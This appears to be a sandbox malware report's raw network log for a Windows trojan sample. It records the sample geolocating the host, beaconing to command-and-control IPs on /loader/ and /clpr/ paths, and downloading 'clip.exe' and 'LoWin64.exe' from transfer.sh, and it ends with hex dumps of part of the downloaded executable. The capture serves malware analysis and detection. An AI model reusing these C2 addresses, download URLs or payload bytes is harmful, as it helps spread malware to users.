                            Timestamp | kBytes transferred | Direction | Data


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            10 | 192.168.2.3 | 49713 | 185.149.146.118 | 80 | C:\Users\user\AppData\Roaming\MonDisc.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:51:37.319658995 CEST | 3417 | OUT | PUT /clpr/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: 185.149.146.118
                            Content-Length: 599
                            Cache-Control: no-cache
                            May 14, 2023 04:51:37.479145050 CEST | 3419 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:51:37 GMT
                            Content-Type: application/json
                            Content-Length: 1814
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vo336Fsl1yxjk0FADqVlY4DaORglEI3KznG6N%2FSk2uuOtKBR2RDKx%2F5jr3Ztb3AFRiaQQzJh1CW51zwb%2BT66hdK9yG3vsmXicC16l9duP6gu392VJBeC4cDvTSwC6%2FdSRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd7264f4ebb65-FRA
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            11 | 192.168.2.3 | 49716 | 185.159.129.168 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:52:38.010570049 CEST | 3424 | OUT | PUT /loader/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            May 14, 2023 04:52:38.220010996 CEST | 3425 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:52:38 GMT
                            Content-Type: application/json
                            Content-Length: 2336
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qPb0Cnm9IjvO4%2B9lBrYKkHCBwZgvS6EgqPum8avxoVJQwSIzI1wpoRelI5WLYQrAOvp3SvEqaWNy%2FcIGfNjmNB0lPo5DjkYFT7BYmCIPGGswDy%2BrQR7W5dIS1EO0y79pmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd8a1de44d922-HEL
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            2 | 192.168.2.3 | 49692 | 208.95.112.1 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:49:30.792505980 CEST | 11 | OUT | GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: ip-api.com
                            May 14, 2023 04:49:30.834532022 CEST | 11 | IN | HTTP/1.1 200 OK
                            Date: Sun, 14 May 2023 02:49:30 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 110
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Ascii: {"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            3 | 192.168.2.3 | 49700 | 185.159.129.168 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:49:52.049341917 CEST | 155 | OUT | PUT /loader/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            May 14, 2023 04:49:52.255124092 CEST | 156 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:49:52 GMT
                            Content-Type: application/json
                            Content-Length: 2336
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6VdoCPNlsxDE4VlhsVvh8K2YfQMsuEm70H8%2BFKdAHRCwNXno0xJxsCnxD6M6CjurCS6HH6xaDGd5fcmxrzMqZlht%2FeRmNvF9CJK33foGUzB1SrG7eCtytPN3Npv9KapCYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd4949941d983-HEL
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            4 | 192.168.2.3 | 49701 | 144.76.136.153 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:49:52.692018032 CEST | 158 | OUT | GET /get/1PRjTr/clip.exe HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: transfer.sh
                            May 14, 2023 04:49:52.716860056 CEST | 159 | IN | HTTP/1.1 301 Moved Permanently
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:49:52 GMT
                            Content-Type: text/html
                            Content-Length: 169
                            Connection: keep-alive
                            Location: https://transfer.sh/get/1PRjTr/clip.exe
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            5 | 192.168.2.3 | 49704 | 208.95.112.1 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:50:39.348226070 CEST | 1777 | OUT | GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: ip-api.com
                            May 14, 2023 04:50:39.386030912 CEST | 1777 | IN | HTTP/1.1 200 OK
                            Date: Sun, 14 May 2023 02:50:39 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 110
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Ascii: {"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            6 | 192.168.2.3 | 49706 | 185.159.129.168 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:51:00.561949015 CEST | 1780 | OUT | PUT /clpr/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            May 14, 2023 04:51:00.751461029 CEST | 1782 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:51:00 GMT
                            Content-Type: application/json
                            Content-Length: 1814
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u47%2BYsg7EUyFiHHM2BaAHtdM3iUlS6p5j4e5doI0PfFdg4A9CyNshkH8W7D2ENdq1QhD1QfdSSUe0GcCP2fRKeX5P%2FgUEA2iioXK6fAolZCVn%2B%2B52%2B3Qaw3m76WRirIX4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd640db95d922-HEL
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            7 | 192.168.2.3 | 49707 | 144.76.136.153 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:51:06.336122036 CEST | 1783 | OUT | GET /get/1h9hjM/LoWin64.exe HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: transfer.sh
                            May 14, 2023 04:51:06.358567953 CEST | 1784 | IN | HTTP/1.1 301 Moved Permanently
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:51:06 GMT
                            Content-Type: text/html
                            Content-Length: 169
                            Connection: keep-alive
                            Location: https://transfer.sh/get/1h9hjM/LoWin64.exe
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            8 | 192.168.2.3 | 49710 | 208.95.112.1 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:51:15.851380110 CEST | 3414 | OUT | GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: ip-api.com
                            May 14, 2023 04:51:15.889153004 CEST | 3415 | IN | HTTP/1.1 200 OK
                            Date: Sun, 14 May 2023 02:51:15 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 110
                            Access-Control-Allow-Origin: *
                            X-Ttl: 23
                            X-Rl: 43
                            Data Ascii: {"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            9 | 192.168.2.3 | 49712 | 185.159.129.168 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            May 14, 2023 04:51:37.208010912 CEST | 3416 | OUT | PUT /clpr/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            May 14, 2023 04:51:37.270178080 CEST | 3416 | IN | HTTP/1.1 503 Service Temporarily Unavailable
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:51:37 GMT
                            Content-Type: text/html
                            Content-Length: 206
                            Connection: keep-alive
                            Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.3 | 49702 | 144.76.136.153 | 443 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2023-05-14 02:49:53 UTC | 0 | OUT | GET /get/1PRjTr/clip.exe HTTP/1.1
                            User-Agent: Monkey
                            Host: transfer.sh
                            Connection: Keep-Alive
                            2023-05-14 02:49:53 UTC | 0 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:49:53 GMT
                            Content-Type: application/x-ms-dos-executable
                            Content-Length: 1619428
                            Connection: close
                            Cache-Control: no-store
                            Content-Disposition: attachment; filename="clip.exe"
                            Retry-After: Sun, 14 May 2023 04:49:55 GMT
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 127.0.0.1,102.129.143.47,102.129.143.47
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 9
                            X-Ratelimit-Reset: 1684032595
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Strict-Transport-Security: max-age=63072000
                            2023-05-14 02:49:54 UTC336INData Raw: fc 13 e8 03 00 00 00 4a cc e8 48 83 04 24 0f c3 d1 eb ee 1b cd 72 e9 02 00 00 00 af 36 eb 05 f6 f9 b7 a6 2b 9e 48 8b 04 24 e9 02 00 00 00 3a 25 48 8d 64 24 08 e9 04 00 00 00 84 28 28 73 e9 04 00 00 00 77 95 ad de 48 8b 44 24 30 e9 04 00 00 00 e1 85 7e cc 9c e9 04 00 00 00 aa 8b 56 e0 eb 03 e2 46 8f e8 02 00 00 00 24 90 48 83 c4 08 eb 07 7c 6e 17 a3 2f 77 fa 9d eb 05 df 25 a7 d8 c5 eb 05 6c 5d cf b9 3e e9 05 00 00 00 e9 00 00 00 00 48 83 c4 28 c3 48 89 4c 24 08 48 83 ec 28 e9 4d 00 00 00 50 e9 04 00 00 00 34 9d 28 b9 9f eb 07 f6 25 59 45 2c 9e 7e e9 05 00 00 00 8b 6c 26 91 1c e8 07 00 00 00 c5 5b 4a 52 99 78 ac 48 83 04 24 1e f9 eb 03 f6 8f 8c 72 05 a3 37 e9 55 27 c3 41 64 a6 77 eb 04 c9 2a 9a 36 9e 58 eb 02 45 a4 c6 44 24 08 4e c6 44 24 09 74 c6 44 24 0a
                            Data Ascii: JH$r6+H$:%Hd$((swHD$0~VF$H|n/w%l]>H(HL$H(MP4(%YE,~l&[JRxH$r7U'Adw*6XED$ND$tD$
                            2023-05-14 02:49:54 UTC352INData Raw: e9 07 00 00 00 3a a2 46 9c 43 99 45 48 8d 64 24 08 e9 07 00 00 00 fc b2 94 b7 d4 13 5e eb 07 5d 55 79 b3 9b 9e b5 c6 44 24 19 4d eb 07 51 36 9f 18 d2 74 84 9c e9 03 00 00 00 16 82 c0 e9 07 00 00 00 87 d9 22 42 7f 79 32 e8 04 00 00 00 1d f8 9a 9a 48 83 c4 08 9d e9 04 00 00 00 fa 3f 85 77 e9 06 00 00 00 6c c5 f1 c3 50 f6 c6 44 24 1a 65 eb 05 d4 a6 fa e6 3f 50 9f e9 04 00 00 00 e2 f0 b1 ff f9 e9 05 00 00 00 a9 d3 4c 1f ad 72 03 45 23 b9 e8 06 00 00 00 58 d2 47 78 65 5f 48 83 c4 08 e9 03 00 00 00 d9 f3 d7 e9 04 00 00 00 57 58 ca 27 9e 48 8b 04 24 eb 02 84 a1 48 8d 64 24 08 e9 02 00 00 00 77 81 eb 04 e0 ca 90 7d c6 44 24 1b 6d c6 44 24 1c 6f c6 44 24 1d 72 9c f9 eb 04 2c 8c 38 f6 72 03 ed 34 d6 e8 07 00 00 00 d9 f5 39 25 3a d6 cc 48 8d 64 24 08 9d e9 02 00 00
                            Data Ascii: :FCEHd$^]UyD$MQ6t"By2H?wlPD$e?PLrE#XGxe_HWX'H$Hd$w}D$mD$oD$r,8r49%:Hd$
                            2023-05-14 02:49:54 UTC368INData Raw: 3e 1a bb de d7 9f 72 06 3d 7d 9a be a9 7b 48 ff c4 f8 eb 03 f1 ca 4b 73 03 d4 cd d6 48 ff c4 f8 73 05 91 30 92 af c5 48 ff c4 38 f6 eb 07 8a 35 cf d3 25 8a 39 74 02 45 26 48 ff c4 f9 72 06 7b ba 20 93 c3 fb 48 ff c4 f8 73 02 3f 76 48 ff c4 38 e4 eb 06 92 3c a3 41 a7 db 74 07 25 ed 3d 22 36 e7 68 48 ff c4 f8 eb 05 7d 2d de db 9f 73 06 72 e7 f2 84 b4 88 eb 04 5a d1 77 14 9d e9 07 00 00 00 45 c6 32 11 f4 f1 ac 48 c7 04 24 00 00 00 00 48 8d 64 24 f8 48 89 04 24 eb 04 31 1b 85 19 9f f9 72 07 f5 b1 50 19 6d 95 95 e8 06 00 00 00 31 28 60 4b ba 8b 48 8d 64 24 08 eb 04 73 36 86 c5 eb 05 db 99 76 c9 4f 9e 58 eb 02 fd 36 eb 07 e3 f0 1f 9d 3b f4 bc e9 88 00 00 00 48 8b 04 24 48 ff c0 e9 02 00 00 00 15 89 9c 38 c0 74 07 d0 39 c1 cd fe e2 e1 e8 05 00 00 00 21 64 32 81
                            Data Ascii: >r=}{HKsHs0H85%9tE&Hr{ Hs?vH8<At%="6hH}-srZwE2H$Hd$H$1rPm1(`KHd$s6vOX6;H$H8t9!d2
                            2023-05-14 02:49:54 UTC384INData Raw: eb 05 3a c7 8b b4 73 f8 e9 04 00 00 00 68 88 af 8b 73 05 ca f8 68 46 c1 e8 06 00 00 00 b4 4f f4 f3 74 70 48 83 04 24 17 eb 02 29 ac c3 61 2e b8 82 68 c0 d4 9e 58 eb 06 25 58 87 26 fc 8d c6 44 24 1d 00 48 8d 64 24 f8 e9 03 00 00 00 11 b1 ab 48 89 04 24 9f e8 06 00 00 00 df c4 aa ca d1 b5 48 ff c4 f8 e9 06 00 00 00 95 55 84 ae 2c af 73 02 72 c9 48 ff c4 e9 02 00 00 00 28 f8 48 ff c4 38 ed eb 06 fb e9 1b 99 40 32 74 03 37 ac 30 48 ff c4 38 ed eb 05 64 ea 27 c0 1f 74 03 78 29 3f 48 ff c4 38 c0 e9 05 00 00 00 ad 48 ff 5d 2c 74 06 34 f8 40 74 ad f4 48 ff c4 f8 73 02 af 53 48 ff c4 f9 eb 03 a7 1e 26 72 03 24 f2 69 48 ff c4 f8 eb 04 a9 4f c4 5f 73 07 79 81 ac ce bb 9f f1 9e 48 8b 04 24 e9 03 00 00 00 f0 de b2 48 8d 64 24 08 e9 03 00 00 00 26 fc de eb 03 b4 41 99
                            Data Ascii: :shshFOtpH$)a.hX%X&D$Hd$H$HU,srH(H8@2t70H8d'tx)?H8H],t4@tHsSH&r$iHO_syH$Hd$&A
                            2023-05-14 02:49:54 UTC400INData Raw: 72 04 2a af 4f c9 48 ff c4 f9 72 04 71 c0 f8 cc e9 07 00 00 00 64 c7 1c a2 8d 41 ce eb 03 5b 30 d8 9e 58 eb 03 fb 64 15 e9 4e 01 00 00 e9 04 00 00 00 82 8c c6 1e 9c 38 ed e9 07 00 00 00 23 3d f8 4c 49 f5 ae 74 06 db d6 d1 28 93 54 e8 02 00 00 00 d3 22 48 ff c4 f8 73 04 9c 7b 91 a3 48 ff c4 38 f6 e9 06 00 00 00 8d ff cb 2a c9 eb 74 02 7f 1b 48 ff c4 f8 eb 07 64 9b cc 82 dd 5f df 73 04 f0 b0 8f ec 48 ff c4 38 f6 e9 04 00 00 00 ac 3b 1a ab 74 06 46 2d 6c cd e6 9f 48 ff c4 f9 eb 04 9a 95 81 74 72 03 4f 58 f1 48 ff c4 f8 73 03 30 5b ea 48 ff c4 e9 07 00 00 00 bd 96 41 b0 15 a6 5c 48 ff c4 38 c0 74 06 4a 7a 7d f2 69 ec e9 02 00 00 00 c0 70 9d eb 07 6e d4 ca 38 98 d9 a9 48 8b 44 24 08 48 ff c0 eb 04 c1 3d 9a d8 48 8d 64 24 f8 eb 04 aa 5a 83 83 48 89 04 24 9f f9
                            Data Ascii: r*OHrqdA[0XdN8#=LIt(T"Hs{H8*tHd_sH8;tF-lHtrOXHs0[HA\H8tJz}ipn8HD$H=Hd$ZH$
                            2023-05-14 02:49:54 UTC416INData Raw: 66 bd 45 8a af 56 74 06 63 eb 5e eb 3d e8 c3 43 29 44 b5 5c 26 61 9e 58 48 8b 44 24 48 e9 d0 00 00 00 e9 02 00 00 00 69 b1 48 8d 64 24 f8 e9 03 00 00 00 5c fb 37 48 89 04 24 eb 03 de fb 96 9f e9 02 00 00 00 59 3e e8 05 00 00 00 54 34 96 74 fb 48 ff c4 38 ff 74 04 3a bc 5a d2 48 ff c4 38 c9 e9 02 00 00 00 4f 55 74 05 12 96 15 85 b9 48 ff c4 f9 e9 03 00 00 00 34 81 b0 72 05 2b c3 a5 91 3f 48 ff c4 eb 04 71 43 eb e2 48 ff c4 f8 73 04 e3 e8 9f 76 48 ff c4 48 ff c4 38 ed e9 03 00 00 00 9b cc 7a 74 02 5f 44 48 ff c4 f9 e9 03 00 00 00 78 e0 8b 72 05 68 23 9b 20 24 e9 07 00 00 00 3f 3d a3 76 d2 88 9c 9e 48 8b 04 24 eb 07 4a 6f 34 c8 b6 32 32 48 8d 64 24 08 eb 07 47 1e 59 af 12 4e d5 eb 07 2c 4e bc ec 1f 1b a1 e9 00 00 00 00 48 83 c4 38 c3 88 54 24 10 48 89 4c 24
                            Data Ascii: fEVtc^=C)D\&aXHD$HiHd$\7H$Y>T4tH8t:ZH8OUtH4r+?HqCHsvHH8zt_DHxrh# $?=vH$Jo422Hd$GYN,NH8T$HL$
                            2023-05-14 02:49:54 UTC432INData Raw: b5 15 38 9d eb 05 2d 55 78 d4 52 2d 00 00 00 e0 89 44 24 24 83 7c 24 24 01 eb 04 2a 9c 77 fc 9c e9 02 00 00 00 62 17 e8 02 00 00 00 17 7e 48 83 c4 08 9d e9 05 00 00 00 81 b9 c8 54 cb 0f 84 70 02 00 00 48 8d 64 24 f8 eb 05 8b bb 53 1d 50 48 89 04 24 e9 07 00 00 00 22 aa f5 57 37 ee 6d 9f e9 04 00 00 00 25 97 50 4b f8 73 02 8a 53 e8 02 00 00 00 35 a5 48 ff c4 f9 e9 07 00 00 00 cf a7 ef 45 3a e1 1a 72 07 b3 26 f9 4b cf 9c ae 48 ff c4 eb 02 7e 12 48 ff c4 f9 e9 07 00 00 00 5f fd 46 bc 54 30 a3 72 03 a6 39 54 48 ff c4 38 f6 eb 06 f0 fb 59 5d 22 70 74 04 4a 96 c9 3e 48 ff c4 f8 e9 05 00 00 00 ae f5 9e 1b ff 73 04 d2 c1 7c b3 48 ff c4 f8 73 04 44 6d 12 55 48 ff c4 e9 06 00 00 00 16 2d b7 76 bf df 48 ff c4 38 c0 74 04 68 52 60 bc eb 07 f6 5f f2 7a 32 9b 21 9e 58
                            Data Ascii: 8-UxR-D$$|$$*wb~HTpHd$SPH$"W7m%PKsS5HE:r&KH~H_FT0r9TH8Y]"ptJ>Hs|HsDmUH-vH8thR`_z2!X
                            2023-05-14 02:49:54 UTC448INData Raw: c4 38 e4 eb 07 2c 83 6c af cb fc 40 74 02 24 b0 48 ff c4 38 c0 e9 06 00 00 00 c3 a3 6b c3 1c 35 74 06 56 55 31 1b e5 63 48 ff c4 e9 02 00 00 00 51 6c 48 ff c4 f8 73 07 c1 59 7d 33 3e bf b6 48 ff c4 f9 eb 05 20 9d 93 26 df 72 02 d3 68 48 ff c4 f8 eb 06 ae c7 7d 26 a7 1d 73 06 6b 4c 92 12 be d0 48 ff c4 f9 e9 05 00 00 00 23 cc c2 5c dc 72 05 ce 7a a2 77 7e 48 ff c4 f9 e9 04 00 00 00 46 81 6d fd 72 03 77 6b a3 eb 06 90 39 40 79 bb b0 9e 58 e9 02 00 00 00 47 b5 0f 85 05 00 00 00 e9 3b 0e 00 00 8b 44 24 44 48 6b c0 18 e9 02 00 00 00 53 4f 48 8d 64 24 f8 48 89 04 24 e9 05 00 00 00 48 f0 12 86 c4 9f e9 07 00 00 00 31 17 7f e2 2d e3 38 e8 07 00 00 00 92 46 7d 52 8f 60 e2 48 83 04 24 14 c3 d4 ad 5e 9d 2f 55 af eb 06 d5 97 72 34 c3 de 9e 48 8b 04 24 48 8d 64 24 08
                            Data Ascii: 8,l@t$H8k5tVU1cHQlHsY}3>H &rhH}&skLH#\rzw~HFmrwk9@yXG;D$DHkSOHd$H$H1-8F}R`H$^/Ur4H$Hd$
                            2023-05-14 02:49:54 UTC464INData Raw: 8d 54 24 38 48 8b 4c 24 30 e8 93 c6 fb ff 48 8d 64 24 f8 eb 04 1e 7b a8 bd 48 89 04 24 e9 03 00 00 00 c1 12 4a 9f f8 eb 04 9c 6a cc de 73 04 fe e2 23 a1 e8 02 00 00 00 1d a7 48 ff c4 38 d2 eb 07 a5 6e 57 37 6b c8 ba 74 05 6d 23 fc da a3 48 ff c4 e9 05 00 00 00 d5 dc ca b0 73 48 ff c4 e9 04 00 00 00 43 2d a9 a0 48 ff c4 48 ff c4 f9 eb 07 c5 fa b9 be d2 4c a5 72 02 5b f8 48 ff c4 f9 72 05 44 ef e8 73 53 48 ff c4 38 db e9 06 00 00 00 3e f8 1c 7b 57 a9 74 06 30 d7 15 92 78 19 48 ff c4 eb 02 c8 68 e9 04 00 00 00 37 ec 4a 16 9e 58 eb 07 b0 b4 3f 86 fa 18 bd eb 06 32 ef 64 44 eb 2e 48 83 f8 30 9c f9 72 06 82 fb be aa cd fa e8 02 00 00 00 a5 3f 48 83 04 24 21 f9 eb 07 7c ee 95 2b 7f 85 f6 72 06 fb c7 ac aa a9 e3 c3 63 1e e2 30 7e ca d7 eb 03 85 89 f5 9d 0f 84 54
                            Data Ascii: T$8HL$0Hd${H$Jjs#H8nW7ktm#HsHC-HHLr[HrDsSH8>{Wt0xHh7JX?2dD.H0r?H$!|+rc0~T
                            2023-05-14 02:49:54 UTC480INData Raw: 48 ff c4 38 d2 eb 07 ed 7e d8 f8 77 9b 64 74 06 69 d9 c7 b2 2d d0 48 ff c4 f9 eb 02 e2 f8 72 03 f2 b9 9e 48 ff c4 38 d2 74 03 13 c1 7e 48 ff c4 eb 07 c7 b4 71 e6 af a7 5c e9 07 00 00 00 d6 21 c4 7e 45 2c 40 9e 48 8b 04 24 eb 06 d5 b4 11 96 68 3e 48 8d 64 24 08 e9 04 00 00 00 c6 dd cd 49 eb 02 c2 ea 48 8b c1 c6 00 00 e9 02 00 00 00 b0 7e 9c 38 ed 74 04 fb a3 db 6a e8 05 00 00 00 de 65 1f 3f 55 48 83 c4 08 9d eb 07 b8 e8 20 af 8f f2 13 eb 02 fd ab e9 0e fd ff ff eb 02 57 b8 48 8d 64 24 f8 e9 06 00 00 00 a3 47 f7 85 ff 30 48 89 04 24 9f eb 04 c9 a9 61 30 e8 03 00 00 00 44 c7 a9 48 ff c4 f9 e9 05 00 00 00 25 b5 e3 88 2e 72 06 da fe 20 e5 f1 7b 48 ff c4 f8 73 02 e1 4a 48 ff c4 38 f6 eb 03 1c 2f b2 74 02 97 b5 48 ff c4 f8 eb 02 84 ec 73 07 f8 8c 72 51 6f 14 ea
                            Data Ascii: H8~wdti-HrH8t~Hq\!~E,@H$h>Hd$IH~8tje?UH WHd$G0H$a0DH%.r {HsJH8/tHsrQo
                            2023-05-14 02:49:54 UTC496INData Raw: f9 9a 59 74 06 9b 1a 2f 28 b4 dc e8 05 00 00 00 30 2b 9c a3 98 48 8d 64 24 08 9e 48 8b 04 24 48 8d 64 24 08 eb 04 dd f3 54 9b 48 89 44 24 38 e9 00 00 00 00 c6 44 24 30 01 48 8b 44 24 38 83 78 0c 00 0f 84 da 02 00 00 48 8b 44 24 38 8b 00 48 8b 8c 24 c8 00 00 00 48 03 c8 48 8b c1 48 89 84 24 88 00 00 00 48 8b 44 24 38 8b 40 10 48 8b 8c 24 c8 00 00 00 48 03 c8 48 8b c1 48 89 44 24 58 48 8b 44 24 38 8b 40 0c 48 8b 8c 24 c8 00 00 00 48 03 c8 48 8b c1 48 89 44 24 50 48 8b 4c 24 50 e8 b3 fc fb ff 48 89 44 24 68 48 83 7c 24 68 00 0f 85 4f 00 00 00 c6 44 24 30 00 48 8d 44 24 31 48 8b f8 33 c0 b9 01 00 00 00 f3 aa 48 8d 54 24 78 48 8d 4c 24 31 e8 55 02 00 00 48 8b c8 e8 d8 88 00 00 4c 8b 4c 24 50 4c 8b c0 48 8b 94 24 d8 00 00 00 48 8b 8c 24 d0 00 00 00 e8 8d 17 fc
                            Data Ascii: Yt/(0+Hd$H$Hd$THD$8D$0HD$8xHD$8H$HHH$HD$8@H$HHHD$XHD$8@H$HHHD$PHL$PHD$hH|$hOD$0HD$1H3HT$xHL$1UHLL$PLH$H$
                            2023-05-14 02:49:54 UTC512INData Raw: 07 c8 40 49 11 3a a2 dc 9f e9 06 00 00 00 eb 46 e9 2e d1 25 eb 02 5a d7 e8 03 00 00 00 80 c4 d6 48 83 c4 08 e9 02 00 00 00 24 f2 eb 02 b6 94 9e 58 e9 06 00 00 00 2d 26 2d 6e 53 1c 48 8b f8 e9 02 00 00 00 2f 17 50 eb 05 e4 68 55 f0 56 9f eb 04 60 81 15 4c f8 73 02 8d ca e8 06 00 00 00 74 28 94 14 e9 d8 48 8d 64 24 08 eb 02 49 8f e9 02 00 00 00 53 d3 9e 48 8b 04 24 e9 03 00 00 00 d8 e1 16 48 8d 64 24 08 eb 04 23 29 63 f1 33 c0 b9 01 00 00 00 f3 aa 48 8d 54 24 48 48 8d 4c 24 20 50 e9 04 00 00 00 b4 e0 31 d4 9f eb 06 d7 83 17 d9 5c 44 f9 e9 04 00 00 00 15 43 b5 2b 72 04 66 6b de db e8 04 00 00 00 ee 22 34 a5 48 8d 64 24 08 e9 02 00 00 00 d9 fe e9 07 00 00 00 11 92 90 b3 36 47 72 9e 48 8b 04 24 48 8d 64 24 08 eb 02 3b 7d e8 4b 10 fa ff e9 06 00 00 00 82 fc fa
                            Data Ascii: @I:F.%ZH$X-&-nSH/PhUV`Lst(Hd$ISH$Hd$#)c3HT$HHL$ P1\DC+rfk"4Hd$6GrH$Hd$;}K
